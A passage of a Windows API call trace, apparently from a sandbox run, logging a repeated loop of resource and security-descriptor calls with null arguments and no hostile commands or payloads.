GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.025] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.025] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.025] LockResource (hResData=0x0) returned 0x0 [0070.025] FreeResource (hResData=0x0) returned 0 [0070.025] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.026] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.026] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.026] FreeResource (hResData=0x0) returned 0 [0070.026] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.026] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.026] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.027] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.027] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.027] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.027] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.027] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.027] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.027] LockResource (hResData=0x0) returned 0x0 [0070.027] FreeResource (hResData=0x0) returned 0 [0070.027] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.027] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.028] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.028] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.028] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.028] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.028] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.028] LockResource (hResData=0x0) returned 0x0 [0070.028] FreeResource (hResData=0x0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.029] FreeResource (hResData=0x0) returned 0 [0070.029] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.029] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.029] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.029] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.029] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.029] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.030] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.030] LockResource (hResData=0x0) returned 0x0 [0070.030] FreeResource (hResData=0x0) returned 0 [0070.030] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.030] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.030] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.030] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.031] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.031] LockResource (hResData=0x0) returned 0x0 [0070.031] FreeResource (hResData=0x0) returned 0 [0070.031] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.031] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.031] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.032] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.032] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.032] LockResource (hResData=0x0) returned 0x0 [0070.032] FreeResource (hResData=0x0) returned 0 [0070.032] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.032] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: 